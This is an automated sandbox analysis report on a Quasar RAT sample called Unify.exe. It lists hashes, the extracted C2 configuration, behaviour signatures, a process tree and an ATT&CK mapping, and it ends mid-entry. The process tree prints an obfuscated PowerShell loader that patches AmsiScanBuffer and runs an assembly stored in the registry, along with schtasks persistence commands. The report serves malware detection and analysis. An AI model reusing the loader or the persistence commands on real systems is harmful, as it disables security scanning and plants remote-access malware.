Analysis

  • max time kernel
    1200s
  • max time network
    1198s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-05-2024 00:51

General

  • Target

    Unify.exe

  • Size

    409KB

  • MD5

    54db32b9d5cab2c1dea1907cf4712b1d

  • SHA1

    812f28828735a92effd2187e155d9ed3f0e915b3

  • SHA256

    e7d8e1b13c833d49fcc46a03d34ff18b7c93bd86bd0764828fa68d3d9eed2bbe

  • SHA512

    6a13febe964f3f639e7d017f58c2f6631c18bea5a1ac716efa49a1c5306ecd2708cf92f133a9fcd8dc22850e661522a98f23c0fb7cb09752bb96a6d50bb69163

  • SSDEEP

    6144:0MP9p1kREG60olVji9QzNg/IiSjFqBFK6WbMN6Y44vZqJBWAb7yMTj:fpiREGJ2ji9QyAhK/N6gBqJBj7yMTj

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

192.168.1.20:4782

localhost:4782

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    hwZQsCIcvotNKosjYueb

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-mstha

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 19 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:64
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{31f0d2dd-5521-42b4-b52d-05be77e0dd7e}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3584
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:408
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
              1⤵
                PID:760
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:392
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1108
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    1⤵
                      PID:1124
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1148
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2720
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:czZanpXTJDNC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RrUIwGhpZggNMN,[Parameter(Position=1)][Type]$KgjZiSyijh)$vdEYfkuhVZs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+'l'+'a'+''+[Char](115)+''+'s'+''+','+''+'A'+'ut'+[Char](111)+'C'+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$vdEYfkuhVZs.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'ci'+[Char](97)+''+[Char](108)+''+'N'+''+'a'+''+'m'+''+[Char](101)+''+','+'Hide'+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+''+'u'+''+[Char](98)+'li'+'c'+'',[Reflection.CallingConventions]::Standard,$RrUIwGhpZggNMN).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');$vdEYfkuhVZs.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+'i'+[Char](100)+'e'+[Char](66)+''+'y'+''+'S'+'ig,'+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al',$KgjZiSyijh,$RrUIwGhpZggNMN).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+'a'+'n'+'ag'+[Char](101)+''+'d'+'');Write-Output $vdEYfkuhVZs.CreateType();}$OXRmaNIcWYdGZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+''+[Char](51)+'2'+'.'+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+[Char](118)+'e'+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$uEUKqbPKtpjueS=$OXRmaNIcWYdGZ.GetMethod(''+'G'+'e'+[Char](116)+''+'P'+''+'r'+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('Pub'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sOjmIwCASooZgGLJTQV=czZanpXTJDNC @([String])([IntPtr]);$MfXwfssSrYLqZnrqtqvDTL=czZanpXTJDNC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BLDGeFhTLBX=$OXRmaNIcWYdGZ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+'e'+[Char](108)+'32.'+'d'+'l'+'l'+'')));$OmXfsyzDRzHntc=$uEUKqbPKtpjueS.Invoke($Null,@([Object]$BLDGeFhTLBX,[Object](''+[Char](76)+''+[Char](111)+'ad'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$gSFljFTpUnBbHVpmH=$uEUKqbPKtpjueS.Invoke($Null,@([Object]$BLDGeFhTLBX,[Object](''+[Char](86)+'i'+'r'+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$QjuMUqj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OmXfsyzDRzHntc,$sOjmIwCASooZgGLJTQV).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+'l');$qWyZcRvkZIzLtyNFz=$uEUKqbPKtpjueS.Invoke($Null,@([Object]$QjuMUqj,[Object]('A'+'m'+''+'s'+''+[Char](105)+'S'+'c'+''+[Char](97)+''+'n'+'B'+[Char](117)+''+[Char](102)+''+'f'+'e'+'r'+'')));$VtSLoodbUo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gSFljFTpUnBbHVpmH,$MfXwfssSrYLqZnrqtqvDTL).Invoke($qWyZcRvkZIzLtyNFz,[uint32]8,4,[ref]$VtSLoodbUo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qWyZcRvkZIzLtyNFz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gSFljFTpUnBbHVpmH,$MfXwfssSrYLqZnrqtqvDTL).Invoke($qWyZcRvkZIzLtyNFz,[uint32]8,0x20,[ref]$VtSLoodbUo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+'7'+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1524
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1208
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1280
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1296
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1324
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1400
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2508
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1408
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1572
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1580
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1636
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1700
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1732
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1788
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1796
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1908
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1996
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:2008
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1552
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1688
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2112
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2208
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2252
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                1⤵
                                                                  PID:2520
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2704
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2712
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2784
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                      1⤵
                                                                        PID:2800
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2852
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2872
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2896
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2920
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3172
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3408
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3472
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Unify.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Unify.exe"
                                                                                    2⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3244
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      "schtasks" /create /tn "$srr-mstha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Unify.exe" /rl HIGHEST /f
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:4636
                                                                                    • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3544
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$srr-mstha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                        4⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:2280
                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2272
                                                                                    • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                      "SCHTASKS.exe" /create /tn "$77Unify.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Unify.exe'" /sc onlogon /rl HIGHEST
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:1520
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                  1⤵
                                                                                    PID:3680
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                    1⤵
                                                                                      PID:3844
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:4000
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:4108
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                        1⤵
                                                                                          PID:628
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                          1⤵
                                                                                            PID:2036
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                            1⤵
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:4828
                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:1668
                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                            1⤵
                                                                                              PID:512
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                              1⤵
                                                                                                PID:4656
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:4272
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                  PID:3332
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                  1⤵
                                                                                                    PID:1472
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4172
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4256
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:4012
                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        1⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Enumerates system info in registry
                                                                                                        PID:3368
                                                                                                      • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                        C:\Windows\System32\WaaSMedicAgent.exe b1354f2ba1237c85937630fb7dda33fa EXaPqgTFoUSRe684H9B82w.0.1.0.0.0
                                                                                                        1⤵
                                                                                                        • Sets service image path in registry
                                                                                                        PID:4724
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          2⤵
                                                                                                            PID:4988
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                          1⤵
                                                                                                          • Drops file in Windows directory
                                                                                                          PID:2848
                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                          1⤵
                                                                                                            PID:4976
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                            1⤵
                                                                                                              PID:3616
                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Checks processor information in registry
                                                                                                              • Enumerates system info in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4708
                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                              1⤵
                                                                                                                PID:764
                                                                                                              • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                1⤵
                                                                                                                  PID:4424
                                                                                                                • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                  1⤵
                                                                                                                    PID:4032
                                                                                                                  • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                    1⤵
                                                                                                                      PID:2136

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                    Execution

                                                                                                                    Scheduled Task/Job

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Persistence

                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                    1
                                                                                                                    T1547

                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                    1
                                                                                                                    T1547.001

                                                                                                                    Scheduled Task/Job

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Privilege Escalation

                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                    1
                                                                                                                    T1547

                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                    1
                                                                                                                    T1547.001

                                                                                                                    Scheduled Task/Job

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Defense Evasion

                                                                                                                    Modify Registry

                                                                                                                    1
                                                                                                                    T1112

                                                                                                                    Discovery

                                                                                                                    Query Registry

                                                                                                                    5
                                                                                                                    T1012

                                                                                                                    System Information Discovery

                                                                                                                    4
                                                                                                                    T1082

                                                                                                                    Peripheral Device Discovery

                                                                                                                    1
                                                                                                                    T1120

                                                                                                                    Command and Control

                                                                                                                    Web Service

                                                                                                                    1
                                                                                                                    T1102

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      MD5

                                                                                                                      317f01e4ddff0748012986efee0ab81e

                                                                                                                      SHA1

                                                                                                                      b2d9a4bb8017bbc9d1c78ca4ac222e7125034073

                                                                                                                      SHA256

                                                                                                                      881d003f22a3db599df71cf1456adc7293f3ed68494d84ab6f140f6867fab7f2

                                                                                                                      SHA512

                                                                                                                      846d3fc8e36109596618505e3637f74c60f8f417d333001cefbf65564db5a825c21969e0427806887f78268053b2897c882915aaecfcf66578d8e3bbdc0d09a7

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                      Filesize

                                                                                                                      162KB

                                                                                                                      MD5

                                                                                                                      152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                      SHA1

                                                                                                                      c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                      SHA256

                                                                                                                      a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                      SHA512

                                                                                                                      2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                    • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                                      Filesize

                                                                                                                      409KB

                                                                                                                      MD5

                                                                                                                      54db32b9d5cab2c1dea1907cf4712b1d

                                                                                                                      SHA1

                                                                                                                      812f28828735a92effd2187e155d9ed3f0e915b3

                                                                                                                      SHA256

                                                                                                                      e7d8e1b13c833d49fcc46a03d34ff18b7c93bd86bd0764828fa68d3d9eed2bbe

                                                                                                                      SHA512

                                                                                                                      6a13febe964f3f639e7d017f58c2f6631c18bea5a1ac716efa49a1c5306ecd2708cf92f133a9fcd8dc22850e661522a98f23c0fb7cb09752bb96a6d50bb69163

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                      SHA1

                                                                                                                      98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                      SHA256

                                                                                                                      ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                      SHA512

                                                                                                                      c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      f313c5b4f95605026428425586317353

                                                                                                                      SHA1

                                                                                                                      06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                      SHA256

